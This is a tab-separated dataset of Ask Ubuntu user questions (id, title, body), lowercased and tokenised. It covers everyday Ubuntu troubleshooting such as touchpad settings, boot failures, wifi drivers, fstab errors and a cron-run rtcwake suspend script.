) ] synclient does not returns anything at all . not even a single error message . the `` mouse and touchpad '' is missing the `` touchpad '' tab . and i get an internal error when trying to open synaptiks . i do n't know why this happens . i 've screwed some stuff up from trying some random solutions , so i figured i 'd try to ask for help here . i wanted to make , at least , vertical edge scrolling work and disable tap clicking . some pictures :
391879	right button on touchpad not recognized	i have an asus g750 . the touchpad ( elantech ) works fine on windows 8 . however , after installing ubuntu the right mouse button is not recognized . the 'synaptiks touchpad management ' software shows a cross sign under touchpad configuration- > hardware information- > right button . similarly , from command line shiva @ shiva-g750jx : ~ $ xinput -- list-props `` etps/2 elantech touchpad '' | grep capabilities synaptics capabilities ( 302 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 which also , i believe , means 'right button not working ' . looking up all the help on this forum , i tried setting the `` soft button areas '' parameter , but that did not change anything . can someone please help ?
391880	installing ubuntu on lenovo and getting boot errors : (	i have looked through so many posts now trying to get my lenovo laptop to run ubuntu 13.10 but for some reason i keep getting the same boot error : http : //s1303.photobucket.com/user/greg_ruth/media/img_2323_zps11a063a3.jpg.html now i have adjusted my boot order in the bios and ensured that the hard drive boots first ( i know that is not what i want but for testings sake i gave it a shot ) . i have ran multiple hdd utilities and i am fairly sure that the hard drive is in good working order . i have tried full installs different versions of ubuntu ( 12.x and 13.x ) with no success . i have installed and tried efibootmgr to ensure the correct drive order and i have purged the grub . i am really running out of things to try . any ideas/help would be awesome ! ! ! thanks .
391881	scp files from machineb to machinea by logging into machinea	i am trying to scp the files from machineb to machinea . i need to run the scp command from machinea to copy files from machineb to machinea . the file that i need to copy from machineb is - /bat/data/snapshot/5.data and where i need to copy the file into machinea is - /data01/primary in which i have root access as well and /data01/primary has only root credentials . below is the ls -lt on machinea david @ machinea : / $ ls -lt drwxr-xr-x 3 root root 4096 nov 7 17:43 data02 drwxr-xr-x 3 root root 4096 nov 7 17:42 data01 drwxr-xr-x 4 root root 4096 nov 7 17:26 opt so i was trying the below scp command on machinea to copy the files - scp david @ machineb : /bat/data/snapshot/5.data root @ machinea : /data01/primary but i am always getting - host key verification failed . i do have root access to machinea but not root access to machineb . and i can ping machineb from machinea as well . and both machines are in production domain as well .
391882	oracle 's jdk wo n't install	after downloading jdk-7u45-linux-x64.tar.gz and moving it to my own folder ~/java , i followed their steps here : http : //docs.oracle.com/javase/7/docs/webnotes/install/linux/linux-jdk.html i apparently only extracted the contents of the file , because when i ran this command : % tar zxvf jdk-7u45-linux-x64.tar.gz it said that it could n't find the % command , so i removed % and ran it , then when i typed java , it output to me what it did when i first installed ubuntu . what am i doing wrong ?
391883	packaging wallpapers for ubuntu software center	i was wondering how to package some wallpapers into a package for the ubuntu software center ?
391884	error reporting in archive file header	i have an error in an archive file that says there is no `` header '' found by apt-get-error.odt how do i report tis and to whom please ?
391885	a simple , one-knob volume control for kde ( kubuntu ) ?	what 's the easiest way in kde ( ubuntu 13.10 ) to have a simple , one-knob volume control for the default playback device ? right now there 's kmix in the taskbar , which shows 3 volume sliders , none of which actually controls the volume of the default playback device . ( i have to click `` mixer , '' look through the various playback devices and find `` built-in audio analog stereo . '' ) in those rare cases where one needs to see every single playback device and stream , kmix is great , but for the other 99 % of the time when i just want to turn down the music , a simple taskbar volume slider would be appreciated . thank you !
391888	is there a way to install a package from a particular repository using apt ?	sometimes a package i want from a ppa has the same name as a different package in another repository . is there a way i can tell apt to download a package of packagename from a certain repo ? i 'd prefer to just use apt , but i suppose aptitude or some other tool would work okay . the simpler the better .
391891	installing ubuntu 12.04/13.10 with hdd and msata ssd , and restoring from backup	my last computer broke and i 'm debating trying something new with the next one . however , there are a lot of pieces to it and i have n't been able to sort them all out on my own . i just bought an acer aspire v5-572g-6679 , which apparently has an unoccupied msata port inside . upon looking inside i realized msata is not the same as sata3 , so i have to return the ssd i bought ( but that 's not particularly relevant ) . i 've read about setting '/ ' and '/home ' on the ssd for maximum performance , and using symlinks for music , pictures , documents , and such . here are my concerns : 1 ) would it even be worth the hassle installing and potential trouble later ? i know ssds are supposed to be one of the best upgrade you can make for computer performance , but i 've read with msata the ssds might not perform to their fullest . 1b ) this page suggests that the motherboard can handle 6gb sata ( so it should n't restrict ssds ? ) . is there any reason this would n't apply to the msata as well ? 2 ) i 'll be restoring my data from a deja dup backup . it worked great last time ( restored my settings and everything ) , but i 'm worried it might not work if the folders are organized differently . if the symlinks are set up properly it should n't be an issue though , right ? 3 ) similar to # 2 , i 'm currently on 12.04 but i 'm thinking of upgrading to 13.10 . would it be better to restore my backup on 12.04 ( the same version i used to make the backup ) and then upgrade , or does it not matter ? 4 ) with symlinks , as long as i do n't move the target folder ( for example , 'music ' on the larger hdd ) it should still work ? changing any files or folders within 'music ' wo n't affect the symlink ? 5 ) symlinks seem easy to make in nautilus . are there any other difficulties in setting the system folders ( music , docs , pics , etc ) as symlinks ? i suppose i could just make a symlink inside the music folder ? 6 ) is this something i might have to worry about booting from an ssd , or is it something optional ? i had trouble understanding the pack and packages referenced . 7 ) can anyone recommend a decent msata ssd or brand ( i bought a samsung , but they do n't make msata i think ) . i 'm looking for 120 or 128gb , around $ 100-150 range . 8 ) the boot sector should be on the ssd , correct ? where should i put swap , and how big should it be ? the comp has 6gb of ram now . 9 ) i just read that /home does n't need to be on a separate partition , as ubuntu can preserve /home even when reinstalling the os now . is this true ? is there any advantage to have /home on a separate partition anymore ? sorry to ask so many questions ! i 've just never tried setting up a comp with multiple drives and it feels complicated . i do n't want to under-prepare and end up with a problem on my hands . thank you so much ! !
391892	ninja kingdom asking to update my flash but it 's updated ?	https : //apps.facebook.com/ninjakingdom/ ? fb_source=canvas_bookmark so is there a workaround to this ? ( on ubuntu 13.10 )
391894	`` the system network services are not compatible with this version . '' error after installed nvidia drivers	i am running ubuntu 13.10 and i installed the nvidia drivers and they work just fine but when i booted back up into runtime 2 i noticed that the network icon that is on the toolbar was gone . i was able to connect to the internet just fine but when i go into network under system preferences it gives me the `` the system network services are not compatible with this version . '' error . any advice would be great .
391895	why are my torrents not downloading ?	i am using transmission-daemon and controlling it through the webgui . currently i have two torrents from separate trackers that are on 0b of ob status . i am using transmission . on one torrent at last announce it says `` got 50 peers '' the other `` got 48 peers . '' port 51413 is listed as open i have changed the ownership of the download folder to debian-transmission any ideas ? i 'm fresh out of troubleshooting steps .
391897	ca n't create windows 7 install bootable usb	i 'm trying to create a bootable windows 7 installation usb drive through ubuntu . i was recommended to use poweriso to do this , however the software is n't recognizing any of my usb flashdrives . i 've tried using unetbootin , winusb , startup disk creator , and universal usb installer , but have had several problems with those too . i do n't have a disk drive or another computer with windows otherwise i would n't have this problem in the first place . thanks in advance .
391900	copying files into custom uck chroot environment	i have been trying to setup a custom ubuntu 13.10 iso , containing programs and utilitiess that are beyond what is installed by default . i am initially using uck and finally got it working for me , after i did a : sudo apt-get install synaptic next , i wanted to quickly add programs using the package manager , but i already had the packages and wanted to simply copy them to the chroot environment 's /var/cache/apt/archive directory . after a search i was unable to see an answer so decided to submit my discovery . after uck has unpacked , you can find the following directories in order to directly manipulate the environment : ~/tmp/remaster-apt-cache/ ~/tmp/remaster-iso/ ~/tmp/remaster-root/ ~/tmp/remaster-root-home/ by simply copying .deb packages from my archive directory to the above i can avoid the need for internet connection and download time to retrieve files i already have . make not of course that i have the same version of packages in my archive directory , as those i need for creating my new uck generated livecd . how can it done ?
391902	lubuntu 13.10 giving error code 10 while installation	i downloaded lubuntu 13.10 after waiting for the whole night and now on every step its returning with error code 10 . please tell me what to do . it is saying that installation may fail entirely if i continue .
391906	tri booting wnidows , liniux , and another os	i own a system with two hard drives . i want to install three os'es - windows , linux , and another os . the other os needs it 's own hard drive and i can pick to boot from other hard drives in said os . how can i dual boot windows and ubuntu on the second hard drive ?
391907	installing ubuntu 12.04 using windows installer	i have installed ubuntu 12.04 using windows installer ( windows 7 ) , and when i reboot and load ubuntu i am getting an error message that windows boot had failed and that the file may be corrupted . what should i do now ? is there any remedy ? thanks
391908	how do you mount a partition locked by windows hibernation without dual boot	i 've installed ubuntu on a friend 's laptop , completely replacing windows 8 . he has a backup ntfs partition that i left untouched after the operating system was replaced . i get an error in nautilus when i try to mount ; it 's because of windows hibernation from what i 've read . the problem is , i did n't keep the windows partition . is there a way to mount and unlock the partition without booting to windows 8 ? i thought to post this question even when i 'm well aware of that one referred to as the original because there it assumes that dual boot is still available . the top answer shows that , and closes off responses for my situation . i needed an answer for when the windows boot is no longer available .
391909	localhost 500 internal server [ solved ]	yesterday localhost is still work , but this morning localhost is down with 500 internal server error . internal server error the server encountered an internal error or misconfiguration and was unable to complete your request . here the logs : /var/log/apache2/error.log [ tue dec 17 11:44:36 2013 ] [ alert ] [ client 127.0.0.1 ] /.htaccess : invalid command 'disable ' , perhaps misspelled or defined by a module not included in the server configuration access.log 127.0.0.1 - - [ 17/dec/2013:11:44:36 +0700 ] `` get /favicon.ico http/1.1 '' 500 630 `` - '' `` mozilla/5.0 ( x11 ; linux x86_64 ) applewebkit/537.36 ( khtml , like gecko ) chrome/29.0.1547.65 safari/537.36 '' my /etc/hosts : 127.0.0.1 localhost 127.0.1.1 asus 127.0.1.1 kd.com 127.0.1.1 www.kd.com 127.0.1.1 angga.net 127.0.1.1 www.angga.net 127.0.1.1 www.dok.com 127.0.1.1 dok.com i was tried this : root ~ # a2enmod rewrite module rewrite already enabled root ~ # a2enmod your choices are : actions alias asis auth_basic auth_digest authn_alias authn_anon authn_dbd authn_dbm authn_default authn_file authnz_ldap authz_dbm authz_default authz_groupfile authz_host authz_owner authz_user autoindex cache cern_meta cgi cgid charset_lite dav dav_fs dav_lock dbd deflate dir disk_cache dump_io env expires ext_filter file_cache filter headers ident imagemap include info ldap log_forensic mem_cache mime mime_magic negotiation php5 proxy proxy_ajp proxy_balancer proxy_connect proxy_ftp proxy_http proxy_scgi reqtimeout rewrite setenvif speling ssl status substitute suexec unique_id userdir usertrack version vhost_alias which module ( s ) do you want to enable ( wildcards ok ) ? rewrite module rewrite already enabled and this is my spec : root ~ # uname -a linux asus 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:25:51 utc 2013 x86_64 x86_64 x86_64 gnu/linux root ~ # php -v php 5.3.10-1ubuntu3.9 with suhosin-patch ( cli ) ( built : dec 12 2013 04:27:25 ) copyright ( c ) 1997-2012 the php group zend engine v2.3.0 , copyright ( c ) 1998-2012 zend technologies root ~ # apache2 -v server version : apache/2.2.22 ( ubuntu ) server built : jul 12 2013 13:37:10 root ~ # mysql -- version mysql ver 15.1 distrib 5.5.34-mariadb , for debian-linux-gnu ( x86_64 ) using readline 5.1 edit i : there is no .htaccess in my /var/www/ dir . edit 2 : here is my apache2.conf http : //www.heypasteit.com/clip/13g7 and here for ls -al /var/www http : //www.heypasteit.com/clip/13h7
391910	lubuntu 13.10 goes to black screen after install and/or try lubuntu	whether i install it or just chose `` try lubuntu without installing '' , it will look like it 's loading up and then the screen goes black . no command prompt , no mouse , no nothing . i try to hit the power button on the tower , it sounds like it does something , but it stays black . i tried burning an image on two different cds and nothing is working . i also tried puppy and it works fine . any ideas ? i really want lubuntu , but it 's just not working .
391912	transferring files form an external hard drive to ubuntu ?	i have a mac mini that is a couple of years old and was thinking of installing ubuntu . will there be any problems when i try to transfer my files from an external hard drive formatted for os x ?
391915	a shortcut that assigns an icon to a running program window in kde environment	some programs have no icon and kde assigns its default icon to them when they are running . is there a way to create a shortcut to that program , so that the shortcut both runs the program and assigns an icon to that ; so that the icon both appears in taskbar tabs and also the in program 's titlebar ? :
391918	blank screen after upgrade to 13.04 - radeon x1200 series on board graphics	i have a dual boot system ( w/xp + ubuntu 12.10 ) that was working fine until i upgraded to 13.04 using the software upgrade app . now i get a blank screens after the grub boot menu when i select ubuntu ( w/xp still works fine ) . prior to the grub menu i get an error : '' error - no video mode activated '' . i have tried all of the recovery options from the second line on the grub menu to no avail ( the low graphics option wo n't work ) . the system has amd dual core 64 bit processors with a ati rs690 ( radeon x1200 series ) onboard graphics chip and an hp wide screen monitor . how can i try to fix my system ? any help would be appreciated .
391923	hard drive not detected in ubuntu live boot	i wanted to format my hard drive . i booted ubuntu 13.10 but the hard drive is not available for mounting . the hard drive is also not detected in either fdisk or gparted utilities . there is no sda* file in /dev/ . it is as if there is no hard disk . i tried installing windows8 but in the partition manager no hard disk is displayed . but when i start the windows repair console i can see my hard disk named as x : where all my files are intact but when i try to format the hard disk from here , i get 'volume label error ' . it is as if the hdd has become read only . after that , i booted live with freebsd and tried to format from the root shell but fdisk cant detect the drive . i also tried configuring the jumper of my motherboard and hard disk but to no avail . there is a continuous intermittent beep sound as i start my computer . my configuration is : motherboard : d945gcr ram:1 gb processor : pentium 4 hard disk : seagate 160 gb ultra ata ( u series 8 ) please help how to repair my computer .
391925	how to access blocked website , e.g . bluebox - error 500 ?	when ever i try to access the shopping websites from blue-box . it says : '' an unexpected condition was encountered while the server was attempting to fulfill the request . error code : 500 '' ... ! how do i resolve this ? as suggested by many i have tried to access the same page giving it some time . disconnecting the connection and reconnecting it again . but nothing is working out .
391926	how to install tally.server 9	i need to install tally.server 9 on a ubuntu 12 server . tally is a accounting software and a multi user application where the main application is installed on the server and users have the client side version installed in the users pc .
391936	mysterious ubuntu restart ( with logs )	my ubuntu 13.10 was running a simulation that should last for days , but it for some reason rebooted automatically . the log said : dec 17 10:24:26 phz225 cron [ 1078 ] : ( cron ) info ( running @ reboot jobs ) so , it should have nothing to do with the hardware . my question is : how to turn off this automatic rebooting ? i routinely submit jobs that can last for days or weeks and i do n't want to lose the results . for you information , this is the complete syslog.1 .
391938	how to fix sigsegv errors on boot ?	i 've been having issues with my 13.10 installation ever since upgrading . problems include an inability to suspend and inconsistent power button behavior ( asus x201e laptop ) . on the plus side , my wifi connection issues from 12.04 are gone ! anyway , i think the issues are related to the error messages i keep getting on startup . here are my notes based on messages from the gui - these happen every time i boot , and i would love to fix them . i 've tried uninstalling / reinstalling these packages from the synaptic package manager with no change . /sbin/wpa_supplicant - crashed with sigsegv /sbin/plymouthd - crashed with sigsegv in script_obj_deref_direct ( )
391939	how can i install ubuntu touch on htc desire 300 ?	when and how i can install ubuntu touch on htc desire 300 ?
391944	i want to configure maximum number of machines in maas	i clustered 3 machines with maas environment and those machines are definitely have different amount of resources . ( a ) 64core with 256gb memory ( b ) 48core with 192gb memory ( c ) 4core with 8gb memory the maas node configuration was quite successful so i have no problem with juju status . but everytime i try to deploy a new service on my maas environment , the deployment encounters an error which is indicating a `` new '' server pending . i only have 3 servers but juju wants to deploy on `` fourth '' node . is there any official configuration parameter for maas environment to limit the maximum number of machine nodes ?
391947	error while running make to install drivers	everytime i want to run make while installing a driver , i get these error messages : make [ 1 ] : *** [ _module_/home/alaa/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-3.8.0-19-generic' make : * [ all ] error 2 how can i get this solved ?
391951	my terminal shows only a blank screen -- how can it ?	i recently installed ubuntu 13.10. in the process of editing bash.bashrc file something went wrong and all of a sudden all i 'm getting when i open my terminal is a blank screen . no directory names or $ . so i ca n't execute any commands to update , install , fix or anything . all the help out i come across assume i can use the command line . . anyone knows how to fix this ? or how maybe how i can recover the default bashrc file ( without using the command line ) ? is my only option uninstalling and reinstalling ubuntu ? i do n't even know how to do that without the command line .
391954	unresolved error with browsing a website : error 404	i am running on ubuntu 13.04 64amd . i can not access the website which i built online through all my browsers . it redirect to the server and it says the error 404 . i asked from the server ( through email ) . they confirmed it is running well and asked me to check with proxy servers . i gone through a proxy server and could see the website running . i asked from a friend to check with his machine ( who is in my country ) he confirmed the site is visible . so in order to access it normally i cleaned all the browser history and cookies . but it was n't resolved . then i cleaned all the browser files with the application sweeper . still problem exists . i deleted the firefox and chromium cache files . still problem exists . what should i do ?
391955	any tweaks after installing lubuntu ?	i have recently installed lubuntu and want some software to make it run smoothly.also , after i installed lubuntu , i saw no grub image ( it seems bad without image ) so , please tell me how to set grub image
391956	13.10 cant get past the login after trying to update catalyst control center	i have tried this : ca n't login after amd catalyst driver installation with no success . although i can not login into my guest account either . either way when i try to login the screen goes black and returns to the login screen . i was trying to use this as a guide . when i try to run sudo startx i get an error along the lines of : startx no gl es2.0 capable screen found with a stacktrace . also i am getting initctl event failed when i do ctrl-alt-f1 in recovery mode . edit0 : tried sudo apt-get upgrade , now i can sort of login into guest ( it wo n't return to login page , but only mouse shows and nothing happens on click . ) edit1 : tried reinstalling xorg , now i can login , although it says : could not apply the stored configuration for monitors ubuntu 13.10 with some information about the screen dimensions and the screen remains black . edit2 : unpluged a monitor now it just has a popup about a system error , but still just black screen and mouse .
391961	how to install pdo_dblib	i want to install pdo_dblib for my application but do n't know how to do that and what things i need . how can i install pdo_dblib in my ubuntu 12.04 . thanks .
391965	zfs arc with zcache ?	i installed ububtu server as home nas . nas is using zfs as filesystem on main data storage . my understanding that zfs uses plenty of memory for arc . but i 'm not sure if arc acts as linux cache , and enabling zcache makes sense for such system . did anyone try such zfs + zcache combination ? does it provide any performance increase for zfs only fileserver ?
391969	rtcwake based script not working as cronjob	i 'm trying to use the following wake script , which i found here , to put my computer to sleep at night and wake it in the morning . the script uses rtcwake : # ! /bin/bash # auto suspend and wake-up script # # puts the computer on standby and automatically wakes it up at specified time # # written by romke van der meulen < redge.online @ gmail.com > # minor mods fossfreedom for askubuntu # # takes a 24hour time hh : mm as its argument # example : # suspend_until 9:30 # suspend_until 18:45 # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # argument check if [ $ # -lt 1 ] ; then echo `` usage : suspend_until hh : mm '' exit fi # check whether specified time today or tomorrow desired= $ ( ( `date + % s -d `` $ 1 '' ` ) ) now= $ ( ( `date + % s` ) ) if [ $ desired -lt $ now ] ; then desired= $ ( ( `date + % s -d `` $ 1 '' ` + 24*60*60 ) ) fi # kill rtcwake if already running sudo killall rtcwake # set rtc wakeup time # n.b . change `` mem '' for the suspend option # find this by `` man rtcwake '' sudo rtcwake -l -m mem -t $ desired & # feedback echo `` suspending ... '' # give rtcwake some time to make its stuff sleep 2 # then suspend # n.b . dont usually require this bit # sudo pm-suspend # any commands you want to launch after wakeup can be placed here # remember : sudo may have expired by now # wake up with monitor enabled n.b . change `` on '' for `` off '' if # you want the monitor to be disabled on wake xset dpms force on # and a fresh console clear echo `` good morning ! '' the script works alright when i run it manually from the command line , but when run as a cronjob , it never puts the computer down . the crontab command is here : 02 10 * * * /home/***/bin/suspend_until 10:03 > > /home/ethan/log/suspend.log 2 > $ 1 the log is empty so i ca n't exactly tell what is going on . any ideas ?
391971	how to execute screen with a fixed process id ?	how can i run an app on ubuntu 12.04 64 bit , with screen with non changing id . so . if i run a program in screen , it got an unique id like 3353. and if i run more apps in screen , i need this id to return the app 's console . i will run an app with non changing id , because if i stop the app , and i start it again , its got a new id . some ideas ?
391974	what 's the most effective way to get wifi working ?	i 'm using ubuntu since a few years and i remember having trouble to connect to the internet with wifi on almost every version . i have been using laptop , desktop pc , with wifi dongle or with built in wifi card . my question is : what is the safer ( and by safer i mean with the best result ) way to use wireless internet connection on ubuntu ? i hope to have answers and different opinions from long-time user with experience on different pc and different way to use wifi . the goal is for me to buy the best equipment and be able to use wireless without worrying at last . i 'm currently on ubuntu 13.10 on a desktop pc with a zyxel wireless dongle and it does n't work good ... p.s . ( sorry for my english : p )
391975	safely remove option missing	i have two usb flash drives . when i connect the first one , the icon in the launcher is that of a usb stick and i get the option `` eject '' only . when i connect the second one , i get a different icon and in the menu there is `` eject '' and `` safely remove '' . why is ubuntu seeing the two drives differently ?
391977	how to get a ssl certificate to be verified in python ?	i 've got an inexpensive certificate from essentialssl ( comodo is the ca ) and i was surprised to discover that python did n't recognize it . requests.exceptions.sslerror : [ errno 1 ] _ssl.c:509 : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed the certificate seems to be properly recognized by all major browsers , still python does not validate it . if possible i would prefer a simple install solution like the one of installing a package or a script . i was a little bit surprised not to see comodo in the default list of recognized ca certs , all major ( 5 ) browsers accept it but not ubuntu wget/python/ ... ( openssl i guess is the cause ) .
391979	wireless connected but no internet bcm4313	after upgrading to ubuntu 13.10 from 13.04 my wireless card connects to the router , the router is connected to internet ( i am sure about that ) but still no internet access for my laptop ! i am using broadcom corporation bcm4313 802.11bgn wireless network adapter . iwconfig gives me : lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11abg essid : '' asteras '' mode : managed frequency:2.462 ghz access point : 80:1f:02:8d:4e:8c bit rate=72 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=70/70 signal level=-38 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 not blocked by anything , i use wl proprietary driver and i also used brmcsmac but it did n't work at all , i could n't even connect to a wireless network .
391981	tp-link tl-wn8200nd works very slowly	i run ubuntu 12.04 on a pc , recently i purchased a tp-link usb adapter tl-wn8200hd as it turned out it is not supported by the drivers that came with the ubuntu 12.04 . from web search i understood that the core of this tp-link usb adapter is realtek hardware and that suitable driver for linux is 8192cu that can be found on the realtek web site . i downloaded it and followed the instructions on http : //www.linux-hardware-guide.com/2013-04-21-tp-link-tl-wn823n-mini-wireless-n-usb-300mbps eventually my usb adapter works , it recognize my wireless network and even connects to internet . but the transition rates are very low . when i connect by wire ( ethernet cable ) i achieve around 10mb download and 1mb upload . while when i connecting wireless i get only 5mb download and almost no upload ( with 1m distance ) what can be the reason for that ? if it can help , this is the result of iwconfig command : wlan0 ieee 802.11bg essid : '' naparniki10 '' nickname : '' < wifi @ realtek > '' mode : managed frequency:2.442 ghz access point : 74 : ea:3a : c3 : a2 : b8 bit rate:54 mb/s sensitivity:0/0 retry : off rts thr : off fragment thr : off power management : off link quality=100/100 signal level=100/100 noise level=0/100 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 p.s : i am relatively new to ubuntu ( and linux ) . so please be detailed in your response
391983	software updates from terminal without sudo	software updates is capable of checking for updates and installing them without asking for a password except for kernel updates . the same is not true for apt-get in a terminal . if you try to apt-get update without sudo you get an error : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) . is there a command you could run in terminal which permits updating without using sudo ?
391987	how can i set a device label for a devices in the nautilus sidebar ?	when i mount any device ( windows partition , external hdd , flash drive , truecrypt mounts ... ) they appear in my nautilus sidebar as `` 75 gb volume '' , `` 11 gb volume '' , etc . how can i change their label to be more meaningful ? ( that is , to use the volume label and/or a label of my choosing )
391989	help with booting	i just uninstalled ubuntu and erased all the partitions but when i boot my computer all i get is this : minimal bash-like line editing is supported . for the first . word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > how can i fix this so i can boot into windows ?
391994	xscreensaver dies when monitor is switched off / gnomescreensaver exposes other screen	i have a rather strange problem to report . i have installed the fglrx module for my amd hd7750 gfx card , multihead ( not xinerama ) . when executing a screenlock in xfce ( by default , xscreensaver ) , and then turning off the monitor , xscreensaver crashes with : xscreensaver crashed with sigabrt in __gl_raise ( ) which of course unlocks access to the desktop . this also occured in debian 7.x on the same machine/same gfx card . if only one monitor is turned off , and the xscreensaver itself does n't crash , the desktop of the other monitor which is still powered-on will be exposed , although the screen will still be locked for input . i have also tried this with gnome-screensaver . i have n't yet seen a crash , but i have seen the exposure of the other still-powered-on screen a few times ( although not every time ) . one solution i 've found is to disable opengl screensavers either via the 'settings ' button when manually starting xscreensaver ( or via the ~/.xscreensaver 'mode blank ' config line ) . system : ubuntu 13.10 x64 3.11.0-14-generic ) wm : xfce4 gfx : fglrx ( apt-provided : 2:13.101-0ubuntu3 ) direct rendering : yes server glx vendor string : ati server glx version string : 1.4 xscreensaver : 5.15-3ubuntu1 gnomescreensaver : 3.6.1-0ubuntu7 i just wanted to bring this to people 's attention , as this could be a security issue . cheers sc .
391995	is canonical/ubuntu community compiling/offering packages for precise : armhf ( 12.04 lts ) ?	ubuntu provides ubuntu core 12.04 for armhf . * does canonical/ubuntu community compile and offer repositories with precompiled armhf packages as it is done with x86/x86_64 arch ? *
391996	can not get wireless network after suspend	i 've been working on an issue of calculation for months , but i ca n't get my wireless card to work . it always shows to me : device not ready . my laptop is acer 4750g with qualcomm atheros ar9287 wireless network adapter ( pci-express ) and the ethernet controller is broadcom corporation netlink bcm57785 gigabit ethernet pcie . i 've tried sudo service network-manager restart but nothing changed . after that , i 've updated my wireless card diver from http : //www.broadcom.com/support/license.php ? file=570x/linux-3.118k.zip and i got : settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : symmetric advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full link partner advertised pause frame use : no link partner advertised auto-negotiation : yes speed : 100mb/s duplex : full port : twisted pair phyad : 1 transceiver : internal auto-negotiation : on mdi-x : off can not get wake-on-lan settings : operation not permitted current message level : 0x000000ff ( 255 ) drv probe link timer ifdown ifup rx_err tx_err can not get link status : operation not permitted does anyone knows how to fix the problem ?
392000	downloading dreamspark ms windows on ubuntu	i have been trying to download windows xp , from the dreamspark website . unfortunately a secure download manager ( sdm ) is used to download the iso image . sdm will only run on windows . how do i remedy this situation .
392003	how to do ant style file filtering when copying files	with ant you can use a filter like : **/target/*.war that means all the paths that have target in them as the last directory . this will match a/b/target/x.war a/target/y.war a/b/c/target/z.war i would like to be able to copy in ubuntu with this kind of filtering ... best case would to do cp **/target/*.war destination i know this does n't work . is there some way in ubuntu i can achieve this ?
392006	smtp error in thunderbird to particalar email	i am sending a mail through thunderbird and it shows a problem but all other mails on other id are delivering . if i send this same mail from gmail.com from browser it delivers . what is and where is the problem .
392007	what will be the diffrence in performance between i3 1st gen and i3 second gen on ubuntu 12.04	i was planning to buy a new laptop . i am confused as on to take i3 first gen and i3 second gen . i will use ubuntu and majorly use the laptop for writing code . will there be any significant diffrence in the performace if i use i3 first gen compared to i3 second gen. ram will be 4 gb for both and harddisk of 500 gb for both .
392013	connect controller dmc2 and maya44 usb with mixx and virtual dj	the controller dmc2 and the sound card maya44 usb works well with windows . can anyone help me to connect them with mixx on ubuntu studio 12.04 ? and also with virtual dj on an ubuntu platform ? thank you .
392018	ati hd4xxx driver installation problem on 12.04.3	my own computer failed , so i decided to install ubuntu 12.04.3 on my wife 's . so i downloaded and installed 12.04.3 ( 64 bits ) . i could n't succeed to install amd proprietary drivers , neither through the amd site package ( 13.1-legacy proposed ) nor through the distribution repositories . is there a way to install a functional proprietary driver for my card with 12.04.3 ? thank you for your help .
392023	what 's wrong with my permissions in sudo gedit /etc/fstab ?	i keep getting this error when trying to mount my secondary internal hdd ... sudo mount /dev/sdb [ mntent ] : line 13 in /etc/fstab is bad mount : ca n't find /dev/sdb in /etc/fstab or /etc/mtab this is what my text editor shows when i enter sudo gedit /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=2f16dad8-494b-4cce-b3d6-aead00238b17 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=e881ffcf-37ab-43d1-b1a4-eb00581b7110 none swap sw 0 0 uuid=543e2fd13e2fab46 /dev/sdb /mnt/media_sdb1 ntfs-3g defaults 0 0 uuid=e46014be6014997e /media/killuminati-one ntfs-3g defaults , umask=0022 , fmask=0133 0 0 any help is greatly appreciated .
392028	how does bumblebee optirun actually work ?	when i use bumblebee optirun command to start a program , google chrome for example , my laptop indicates that it switched to nvidia gpu . my question is : is then whole desktop rendered by nvidia or just the program i started with optirun ? i ca n't imagine that some parts of screen are rendered by one graphic card and other parts by another , but the way optirun command is used ( in combination with specific program ) makes me wonder .
392031	open source ati driver froze after installation and fail to boot	hello everyone and thank you for reading . i installed today a hd5500 radeon card in my system today , and installed the open source driver . following this , my system worked for a while though no i could see no performance improvement . then the whole system froze , and i was never able to boot ubuntu with unity again . i can only boot the console now , graphic boot will only result in a black screen . in a panic , i tried to remove the open source drivers and install the proprietary drivers in hope this would make something , and it did n't . tried to remove the gpu hardware from the system and use the motherboard vga feed , but still no change ( got a frozen loading screen instead of pitch dark ) . i severely lack troubleshooting skills in ubuntu , not mentioning in a console-only treat . i am not sure of the current state of my drivers , but it 's surely messy . i do n't even know how to perform a check on that : ( could you please tell me a way of getting the system to boot again , through a complete cleanup or reinstallation that would hopefully work ? thank you very much .
392041	xubuntu 12.04 ca n't see my micro sd	i want to connect a micro sd in my laptop ( hp pavilion g6 2320sl ) with a micro sd adapter but xubuntu ( 12.04 lts ) ca n't see that ( all works fine in ubuntu 12.04 ) . nothing appears in thunar and i ca n't see my micro sd in gparted or fdisk too . im new with linux and maybe there is a simple way to solve this problem but i did n't find any solution . p.s if i put the micro sd in an usb adapter all works fine but i really need to read the micro sd with the normal adapter .
